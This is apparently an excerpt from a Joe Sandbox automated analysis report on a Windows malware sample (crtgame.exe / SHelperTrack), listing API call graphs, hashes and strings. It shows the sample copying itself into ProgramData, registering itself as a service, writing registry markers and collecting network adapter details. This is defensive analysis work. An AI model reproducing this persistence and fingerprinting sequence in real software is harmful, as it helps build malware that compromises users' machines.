                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Focus
                                                                                    • String ID: +qI
                                                                                    • API String ID: 2734777837-4068327824
                                                                                    • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                    • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                                    • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                    • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                                    APIs
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
                                                                                    • FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem
                                                                                    • String ID: $pI
                                                                                    • API String ID: 2086374402-3761944556
                                                                                    • Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                    • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                                    • Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                    • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastSleep
                                                                                    • String ID:
                                                                                    • API String ID: 1458359878-0
                                                                                    • Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                    • Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
                                                                                    • Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                    • Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

                                                                                    Execution Graph

                                                                                    Execution Coverage:16.7%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:12.1%
                                                                                    Total number of Nodes:437
                                                                                    Total number of Limit Nodes:7
                                                                                    execution_graph 2739 403002 GetVersion 2764 4037ee HeapCreate 2739->2764 2741 403061 2742 403066 2741->2742 2743 40306e 2741->2743 2862 40311d 2742->2862 2776 404dd6 2743->2776 2747 403076 GetCommandLineA 2790 404ca4 2747->2790 2751 403090 2822 40499e 2751->2822 2753 403095 2754 40309a GetStartupInfoA 2753->2754 2835 404946 2754->2835 2756 4030ac GetModuleHandleA 2839 4026ee GetModuleHandleA GetModuleFileNameA 2756->2839 2759 4030d0 2868 4046ed 2759->2868 2763 4030ea 2765 403844 2764->2765 2766 40380e 2764->2766 2765->2741 2875 4036a6 2766->2875 2769 40382a 2772 403847 2769->2772 2889 40409c 2769->2889 2770 40381d 2887 40384b HeapAlloc 2770->2887 2772->2741 2774 403827 2774->2772 2775 403838 HeapDestroy 2774->2775 2775->2765 2952 402f50 2776->2952 2780 404df5 GetStartupInfoA 2787 404f06 2780->2787 2789 404e41 2780->2789 2782 404f6d SetHandleCount 2782->2747 2783 404f2d GetStdHandle 2785 404f3b GetFileType 2783->2785 2783->2787 2784 402f50 12 API calls 2784->2789 2785->2787 2786 404eb2 2786->2787 2788 404ed4 GetFileType 2786->2788 2787->2782 2787->2783 2788->2786 2789->2784 2789->2786 2789->2787 2791 404cf2 2790->2791 2792 404cbf GetEnvironmentStringsW 2790->2792 2794 404cc7 2791->2794 2795 404ce3 2791->2795 2793 404cd3 GetEnvironmentStrings 2792->2793 2792->2794 2793->2795 2796 403086 2793->2796 2797 404d0b WideCharToMultiByte 2794->2797 2798 404cff GetEnvironmentStringsW 2794->2798 2795->2796 2800 404d91 2795->2800 2801 404d85 GetEnvironmentStrings 2795->2801 2813 404a57 2796->2813 2802 404d71 FreeEnvironmentStringsW 2797->2802 2803 404d3f 2797->2803 2798->2796 2798->2797 2804 402f50 12 API calls 2800->2804 2801->2796 2801->2800 2802->2796 2805 402f50 12 API calls 2803->2805 2811 404dac 2804->2811 2806 404d45 2805->2806 2806->2802 2807 404d4e WideCharToMultiByte 2806->2807 2809 404d68 2807->2809 2810 404d5f 2807->2810 2808 404dc2 FreeEnvironmentStringsA 2808->2796 2809->2802 3018 403141 2810->3018 2811->2808 2814 404a69 2813->2814 2815 404a6e GetModuleFileNameA 2813->2815 3048 4065fe 2814->3048 2817 404a91 2815->2817 2818 402f50 12 API calls 2817->2818 2820 404ab2 2818->2820 2819 404ac2 2819->2751 2820->2819 2821 4030f8 7 API calls 2820->2821 2821->2819 2823 4049ab 2822->2823 2825 4049b0 2822->2825 2824 4065fe 19 API calls 2823->2824 2824->2825 2826 402f50 12 API calls 2825->2826 2827 4049dd 2826->2827 2828 4030f8 7 API calls 2827->2828 2833 4049f1 2827->2833 2828->2833 2829 404a34 2830 403141 7 API calls 2829->2830 2831 404a40 2830->2831 2831->2753 2832 402f50 12 API calls 2832->2833 2833->2829 2833->2832 2834 4030f8 7 API calls 2833->2834 2834->2833 2836 40494f 2835->2836 2838 404954 2835->2838 2837 4065fe 19 API calls 2836->2837 2837->2838 2838->2756 3072 402e60 2839->3072 2844 402774 lstrcmpiW 2846 402786 2844->2846 2847 4027eb lstrcmpiW 2844->2847 2845 402959 StartServiceCtrlDispatcherA 2845->2759 2846->2845 2856 4027a5 2846->2856 2859 4027e6 2846->2859 2848 402803 2847->2848 2849 40289a lstrcmpiW 2847->2849 3078 402546 2848->3078 2849->2845 2850 4028ac RegCreateKeyExA 2849->2850 2853 40292d SetEvent CreateThread WaitForSingleObject ExitProcess 2850->2853 2854 4028ce 2850->2854 3135 40234f 2853->3135 2858 4028e0 GetTickCount wsprintfA RegSetValueExA RegCloseKey 2854->2858 2855 402810 RegCreateKeyExA 2855->2845 2857 402836 2855->2857 2860 4027ba CreateFileA CloseHandle ExitProcess 2856->2860 2861 402848 GetTickCount wsprintfA RegSetValueExA RegCloseKey 2857->2861 2858->2853 2859->2845 2861->2845 2863 403126 2862->2863 2864 40312b 2862->2864 2865 405154 7 API calls 2863->2865 2866 40518d 7 API calls 2864->2866 2865->2864 2867 403134 ExitProcess 2866->2867 3157 40470f 2868->3157 2871 4047c2 2872 4047ce 2871->2872 2873 4048f7 UnhandledExceptionFilter 2872->2873 2874 4047e2 2872->2874 2873->2874 2874->2763 2874->2874 2898 402db0 2875->2898 2878 4036e9 GetEnvironmentVariableA 2882 403708 2878->2882 2886 4037c6 2878->2886 2879 4036cf 2879->2878 2880 4036e1 2879->2880 2880->2769 2880->2770 2883 40374d GetModuleFileNameA 2882->2883 2884 403745 2882->2884 2883->2884 2884->2886 2900 405e4e 2884->2900 2886->2880 2903 403679 GetModuleHandleA 2886->2903 2888 403867 2887->2888 2888->2774 2890 4040b0 HeapAlloc 2889->2890 2891 4040a9 2889->2891 2892 4040cd VirtualAlloc 2890->2892 2897 404105 2890->2897 2891->2892 2893 4041c2 2892->2893 2894 4040ed VirtualAlloc 2892->2894 2895 4041ca HeapFree 2893->2895 2893->2897 2896 4041b4 VirtualFree 2894->2896 2894->2897 2895->2897 2896->2893 2897->2774 2899 402dbc GetVersionExA 2898->2899 2899->2878 2899->2879 2905 405e65 2900->2905 2904 403690 2903->2904 2904->2880 2907 405e7d 2905->2907 2909 405ead 2907->2909 2912 405446 2907->2912 2908 405446 6 API calls 2908->2909 2909->2908 2911 405e61 2909->2911 2916 40744b 2909->2916 2911->2886 2913 405464 2912->2913 2915 405458 2912->2915 2922 4067ae 2913->2922 2915->2907 2917 407476 2916->2917 2918 407459 2916->2918 2919 407492 2917->2919 2920 405446 6 API calls 2917->2920 2918->2909 2919->2918 2934 4068f7 2919->2934 2920->2919 2923 4067f7 2922->2923 2924 4067df GetStringTypeW 2922->2924 2925 406822 GetStringTypeA 2923->2925 2926 406846 2923->2926 2924->2923 2927 4067fb GetStringTypeA 2924->2927 2928 4068e3 2925->2928 2926->2928 2930 40685c MultiByteToWideChar 2926->2930 2927->2923 2927->2928 2928->2915 2930->2928 2931 406880 2930->2931 2931->2928 2932 4068ba MultiByteToWideChar 2931->2932 2932->2928 2933 4068d3 GetStringTypeW 2932->2933 2933->2928 2935 406927 LCMapStringW 2934->2935 2936 406943 2934->2936 2935->2936 2937 40694b LCMapStringA 2935->2937 2939 4069a9 2936->2939 2940 40698c LCMapStringA 2936->2940 2937->2936 2938 406a85 2937->2938 2938->2918 2939->2938 2941 4069bf MultiByteToWideChar 2939->2941 2940->2938 2941->2938 2942 4069e9 2941->2942 2942->2938 2943 406a1f MultiByteToWideChar 2942->2943 2943->2938 2944 406a38 LCMapStringW 2943->2944 2944->2938 2945 406a53 2944->2945 2946 406a59 2945->2946 2948 406a99 2945->2948 2946->2938 2947 406a67 LCMapStringW 2946->2947 2947->2938 2948->2938 2949 406ad1 LCMapStringW 2948->2949 2949->2938 2950 406ae9 WideCharToMultiByte 2949->2950 2950->2938 2961 402f62 2952->2961 2955 4030f8 2956 403101 2955->2956 2957 403106 2955->2957 2998 405154 2956->2998 3004 40518d 2957->3004 2962 402f5f 2961->2962 2964 402f69 2961->2964 2962->2780 2962->2955 2964->2962 2965 402f8e 2964->2965 2966 402f9d 2965->2966 2969 402fb2 2965->2969 2973 402fab 2966->2973 2974 403be7 2966->2974 2968 402ff1 HeapAlloc 2970 403000 2968->2970 2969->2968 2969->2973 2980 404394 2969->2980 2970->2964 2971 402fb0 2971->2964 2973->2968 2973->2970 2973->2971 2977 403c19 2974->2977 2975 403cb8 2979 403cc7 2975->2979 2994 403fa1 2975->2994 2977->2975 2977->2979 2987 403ef0 2977->2987 2979->2973 2981 4043a2 2980->2981 2982 404563 2981->2982 2985 40448e VirtualAlloc 2981->2985 2986 40445f 2981->2986 2983 40409c 5 API calls 2982->2983 2983->2986 2985->2986 2986->2973 2988 403f33 HeapAlloc 2987->2988 2989 403f03 HeapReAlloc 2987->2989 2990 403f83 2988->2990 2991 403f59 VirtualAlloc 2988->2991 2989->2990 2992 403f22 2989->2992 2990->2975 2991->2990 2993 403f73 HeapFree 2991->2993 2992->2988 2993->2990 2995 403fb3 VirtualAlloc 2994->2995 2997 403ffc 2995->2997 2997->2979 2999 40515e 2998->2999 3000 40518d 7 API calls 2999->3000 3003 40518b 2999->3003 3001 405175 3000->3001 3002 40518d 7 API calls 3001->3002 3002->3003 3003->2957 3006 4051a0 3004->3006 3005 4052b7 3009 4052ca GetStdHandle WriteFile 3005->3009 3006->3005 3007 4051e0 3006->3007 3012 40310f 3006->3012 3008 4051ec GetModuleFileNameA 3007->3008 3007->3012 3010 405204 3008->3010 3009->3012 3013 40661a 3010->3013 3012->2780 3014 406627 LoadLibraryA 3013->3014 3017 406669 3013->3017 3015 406638 GetProcAddress 3014->3015 3014->3017 3016 40664f GetProcAddress GetProcAddress 3015->3016 3015->3017 3016->3017 3017->3012 3019 40314d 3018->3019 3027 403169 3018->3027 3020 403157 3019->3020 3021 40316d 3019->3021 3023 403199 HeapFree 3020->3023 3024 403163 3020->3024 3022 403198 3021->3022 3026 403187 3021->3026 3022->3023 3023->3027 3029 4038be 3024->3029 3035 40434f 3026->3035 3027->2809 3030 4038fc 3029->3030 3034 403bb2 3029->3034 3031 403af8 VirtualFree 3030->3031 3030->3034 3032 403b5c 3031->3032 3033 403b6b VirtualFree HeapFree 3032->3033 3032->3034 3033->3034 3034->3027 3036 404392 3035->3036 3037 40437c 3035->3037 3036->3027 3037->3036 3039 404236 3037->3039 3042 404243 3039->3042 3040 4042f3 3040->3036 3041 404264 VirtualFree 3041->3042 3042->3040 3042->3041 3044 4041e0 VirtualFree 3042->3044 3045 4041fd 3044->3045 3046 40422d 3045->3046 3047 40420d HeapFree 3045->3047 3046->3042 3047->3042 3049 406607 3048->3049 3050 40660e 3048->3050 3052 40623a 3049->3052 3050->2815 3059 4063d3 3052->3059 3054 4063c7 3054->3050 3057 40627d GetCPInfo 3058 406291 3057->3058 3058->3054 3064 406479 GetCPInfo 3058->3064 3060 4063f3 3059->3060 3061 4063e3 GetOEMCP 3059->3061 3062 40624b 3060->3062 3063 4063f8 GetACP 3060->3063 3061->3060 3062->3054 3062->3057 3062->3058 3063->3062 3065 406564 3064->3065 3067 40649c 3064->3067 3065->3054 3066 4067ae 6 API calls 3068 406518 3066->3068 3067->3066 3069 4068f7 9 API calls 3068->3069 3070 40653c 3069->3070 3071 4068f7 9 API calls 3070->3071 3071->3065 3073 40273a GetCommandLineW CommandLineToArgvW GetLocalTime 3072->3073 3074 401fbe 3073->3074 3075 401fd3 3074->3075 3097 401a1d 3075->3097 3077 401fdc 3077->2844 3077->2845 3079 402567 3078->3079 3080 402574 GetModuleHandleA GetModuleFileNameA 3079->3080 3081 402f50 12 API calls 3080->3081 3082 402593 3081->3082 3083 402f50 12 API calls 3082->3083 3084 4025a4 3083->3084 3085 4025d9 GetModuleHandleA GetModuleFileNameW RegOpenKeyExA 3084->3085 3086 4026d4 3085->3086 3087 402614 RegQueryValueExA 3085->3087 3086->2845 3086->2855 3087->3086 3088 40263e RegCloseKey 3087->3088 3089 402652 3088->3089 3090 40265e CreateDirectoryA 3089->3090 3091 402674 3090->3091 3092 402686 CopyFileA 3091->3092 3092->3086 3093 40269c OpenSCManagerA 3092->3093 3093->3086 3094 4026ad CreateServiceA 3093->3094 3095 4026db CloseServiceHandle CloseServiceHandle 3094->3095 3096 4026cb CloseServiceHandle 3094->3096 3095->3086 3096->3086 3098 401a2c 3097->3098 3105 401a58 CreateFileA 3098->3105 3104 401a47 3104->3077 3106 401a35 3105->3106 3112 401a86 3105->3112 3113 401b54 LoadLibraryA 3106->3113 3107 401aa1 DeviceIoControl 3107->3112 3109 401b43 CloseHandle 3109->3106 3110 401b17 GetLastError 3110->3109 3110->3112 3112->3107 3112->3109 3112->3110 3125 402d16 3112->3125 3128 402d08 3112->3128 3114 401b77 GetProcAddress 3113->3114 3115 401a3e 3113->3115 3116 401c21 FreeLibrary 3114->3116 3118 401b8e 3114->3118 3122 401c2f 3115->3122 3116->3115 3117 401b9e GetAdaptersInfo 3117->3118 3118->3117 3119 401c1e 3118->3119 3120 402d16 7 API calls 3118->3120 3121 402d08 12 API calls 3118->3121 3119->3116 3120->3118 3121->3118 3131 401c5b GetWindowsDirectoryA 3122->3131 3124 401c3e 3124->3104 3126 403141 7 API calls 3125->3126 3127 402d1f 3126->3127 3127->3112 3129 402f62 12 API calls 3128->3129 3130 402d13 3129->3130 3130->3112 3132 401cb7 3131->3132 3133 401c7e CreateFileA 3131->3133 3132->3124 3133->3132 3134 401ca2 GetFileTime CloseHandle 3133->3134 3134->3132 3136 402360 WaitForSingleObject 3135->3136 3137 4023ca 3136->3137 3138 402366 3136->3138 3139 4023af Sleep 3138->3139 3142 4021c6 VirtualAlloc 3138->3142 3149 401ffb FindResourceA 3138->3149 3139->3136 3146 4021f8 3142->3146 3143 40230a 3145 402331 Sleep 3143->3145 3144 402293 GetLastError LoadLibraryExA 3144->3146 3147 402347 3145->3147 3146->3143 3146->3144 3148 4022dc GetProcAddress 3146->3148 3147->3138 3148->3146 3150 40201d GetLastError SizeofResource 3149->3150 3156 402036 3149->3156 3151 40203d LoadResource LockResource GlobalAlloc 3150->3151 3150->3156 3152 402069 3151->3152 3153 402092 GetTickCount 3152->3153 3154 40209c GlobalAlloc 3153->3154 3154->3156 3156->3138 3158 40471b GetCurrentProcess TerminateProcess 3157->3158 3159 40472c 3157->3159 3158->3159 3160 4030d9 3159->3160 3161 404796 ExitProcess 3159->3161 3160->2871 3193 4032e3 3194 4032f1 3193->3194 3195 40330c 3193->3195 3200 405918 3194->3200 3203 405945 3195->3203 3198 403315 3199 4032fa 3206 406ce7 3200->3206 3202 405934 3202->3199 3204 406ce7 6 API calls 3203->3204 3205 405961 3204->3205 3205->3198 3207 406d22 3206->3207 3208 406fd7 3207->3208 3209 405446 6 API calls 3207->3209 3213 406fcf 3207->3213 3210 405446 6 API calls 3208->3210 3212 407022 3208->3212 3209->3207 3210->3208 3211 405446 6 API calls 3211->3212 3212->3211 3212->3213 3213->3202 3214 403223 3219 4054bb 3214->3219 3216 405446 6 API calls 3217 403231 3216->3217 3217->3216 3218 403263 3217->3218 3220 4054e8 3219->3220 3223 4054cb 3219->3223 3221 405446 6 API calls 3220->3221 3222 405506 3220->3222 3221->3222 3222->3223 3224 4068f7 9 API calls 3222->3224 3223->3217 3224->3223 3167 405e45 3168 4030f8 7 API calls 3167->3168 3169 405e4c 3168->3169 3225 402426 RegisterServiceCtrlHandlerA 3226 402449 3225->3226 3227 40253f 3225->3227 3228 402457 SetServiceStatus GetLastError CreateEventA 3226->3228 3229 4024d0 SetServiceStatus CreateThread WaitForSingleObject CloseHandle 3228->3229 3230 4024b1 GetLastError 3228->3230 3231 402536 SetServiceStatus 3229->3231 3230->3231 3231->3227 3170 406a0b 3171 406a1a 3170->3171 3172 406a85 3171->3172 3173 406a1f MultiByteToWideChar 3171->3173 3173->3172 3174 406a38 LCMapStringW 3173->3174 3174->3172 3175 406a53 3174->3175 3176 406a59 3175->3176 3178 406a99 3175->3178 3176->3172 3177 406a67 LCMapStringW 3176->3177 3177->3172 3178->3172 3179 406ad1 LCMapStringW 3178->3179 3179->3172 3180 406ae9 WideCharToMultiByte 3179->3180 3180->3172 3232 4068ab 3233 4068b2 3232->3233 3234 4068e3 3233->3234 3235 4068ba MultiByteToWideChar 3233->3235 3235->3234 3236 4068d3 GetStringTypeW 3235->3236 3236->3234 3237 4030ed 3244 4046fe 3237->3244 3239 4030f8 3240 403106 3239->3240 3241 405154 7 API calls 3239->3241 3242 40518d 7 API calls 3240->3242 3241->3240 3243 40310f 3242->3243 3245 40470f 3 API calls 3244->3245 3246 40470b 3245->3246 3246->3239 3162 40470f 3163 40471b GetCurrentProcess TerminateProcess 3162->3163 3164 40472c 3162->3164 3163->3164 3165 4047a6 3164->3165 3166 404796 ExitProcess 3164->3166 3182 4023d1 3183 402423 3182->3183 3184 4023d8 3182->3184 3184->3183 3185 4023e3 GetLastError SetServiceStatus SetEvent 3184->3185 3185->3183 3247 405074 3250 40507c 3247->3250 3248 40510e 3250->3248 3251 404f84 RtlUnwind 3250->3251 3252 404f9c 3251->3252 3252->3250 3253 40507c 3254 40510e 3253->3254 3256 40509a 3253->3256 3255 404f84 RtlUnwind 3255->3256 3256->3254 3256->3255 3186 402ddf 3187 402de4 3186->3187 3190 4031fa GetModuleHandleA 3187->3190 3189 402de9 3191 403209 GetProcAddress 3190->3191 3192 403219 3190->3192 3191->3192 3192->3189 3257 406abf 3258 406acd 3257->3258 3259 406ad1 LCMapStringW 3258->3259 3262 406a85 3258->3262 3260 406ae9 WideCharToMultiByte 3259->3260 3259->3262 3260->3262

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402712
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 00402729
                                                                                    • GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402746
                                                                                    • CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274D
                                                                                    • GetLocalTime.KERNEL32(0040C258,?,00000000), ref: 0040275A
                                                                                    • lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277C
                                                                                    • CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027C9
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D0
                                                                                    • ExitProcess.KERNEL32 ref: 004027D7
                                                                                    • lstrcmpiW.KERNEL32(?,00409110,?,00000000), ref: 004027F9
                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\SVGAHelper,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 00402828
                                                                                    • GetTickCount.KERNEL32 ref: 0040284B
                                                                                    • wsprintfA.USER32 ref: 00402863
                                                                                    • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402886
                                                                                    • RegCloseKey.KERNELBASE(?), ref: 0040288F
                                                                                    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040295D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
                                                                                    • String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$SHelperTrack$SHelperTrack$Software\SVGAHelper$sht1206%d$sht1207%d$test
                                                                                    • API String ID: 99468869-2721247305
                                                                                    • Opcode ID: 56f4d052c141ab9e6f25ea2b185a745dcb3328293780e367d610730049fd8f39
                                                                                    • Instruction ID: 9f47e9fa039345968f7117780ad612f26cc73013d3b62508480a4564cf6a7c99
                                                                                    • Opcode Fuzzy Hash: 56f4d052c141ab9e6f25ea2b185a745dcb3328293780e367d610730049fd8f39
                                                                                    • Instruction Fuzzy Hash: BA6110B1900209FFEB10ABA09E8DFAF7B6CEB04344F10457AB645F21D1DB784D588B68

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,7591F360,00000000), ref: 00402580
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,7591F360,00000000), ref: 00402587
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360), ref: 004025E8
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 004025EF
                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402606
                                                                                    • RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\SHelperTrack\SHelperTrack.exe,?), ref: 00402630
                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 00402641
                                                                                    • CreateDirectoryA.KERNELBASE(C:\ProgramData\SHelperTrack\SHelperTrack.exe,00000000), ref: 00402663
                                                                                    • CopyFileA.KERNEL32(?,C:\ProgramData\SHelperTrack\SHelperTrack.exe,00000000), ref: 00402692
                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A0
                                                                                    • CreateServiceA.ADVAPI32(00000000,SHelperTrack,SHelperTrack,000F01FF,00000010,00000002,00000001,C:\ProgramData\SHelperTrack\SHelperTrack.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C1
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 004026CE
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E2
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
                                                                                    • String ID: .exe$C:\ProgramData\SHelperTrack\SHelperTrack.exe$Common AppData$SHelperTrack$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                    • API String ID: 3461818117-2502623774
                                                                                    • Opcode ID: 13715eb351cd6c70e00849861dd2f03c5aaea0087d691cbf5b036631445e3641
                                                                                    • Instruction ID: d526ef41eebe8d1c9ee91373e78b86e4f875a97381db2fef2651b379f2dad033
                                                                                    • Opcode Fuzzy Hash: 13715eb351cd6c70e00849861dd2f03c5aaea0087d691cbf5b036631445e3641
                                                                                    • Instruction Fuzzy Hash: B74182B1940218BBDB106BA1DF8EE9F7A7CEF45748F00047AB644B10D2DBB94D448AAC

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 63 401b54-401b71 LoadLibraryA 64 401b77-401b88 GetProcAddress 63->64 65 401c2a-401c2e 63->65 66 401c21-401c24 FreeLibrary 64->66 67 401b8e-401b97 64->67 66->65 68 401b9e-401bae GetAdaptersInfo 67->68 69 401bb0-401bb9 68->69 70 401be4-401bec 68->70 71 401bca-401be0 call 402d30 call 4018cc 69->71 72 401bbb-401bbf 69->72 73 401bf5-401bf9 70->73 74 401bee-401bf4 call 402d16 70->74 71->70 72->70 77 401bc1-401bc8 72->77 75 401bfb-401bff 73->75 76 401c1e-401c20 73->76 74->73 75->76 81 401c01-401c04 75->81 76->66 77->71 77->72 83 401c06-401c0c 81->83 84 401c0f-401c1c call 402d08 81->84 83->84 84->68 84->76
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
                                                                                    • GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
                                                                                    • FreeLibrary.KERNEL32(00401A3E), ref: 00401C24
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                    • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                    • API String ID: 514930453-3667123677
                                                                                    • Opcode ID: 89f595ccf776b440989b864168dac3f9ad1edd299b79c39a084b6ecbd17e9917
                                                                                    • Instruction ID: 07c40c0b436640c841799373c8e41aaef243d15379a275d75ad88497ffb5d957
                                                                                    • Opcode Fuzzy Hash: 89f595ccf776b440989b864168dac3f9ad1edd299b79c39a084b6ecbd17e9917
                                                                                    • Instruction Fuzzy Hash: 0E21A770900209AFDF219BA5CD447EFBBB8EF41344F1440BAD504B22E1E7789E85CB69

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
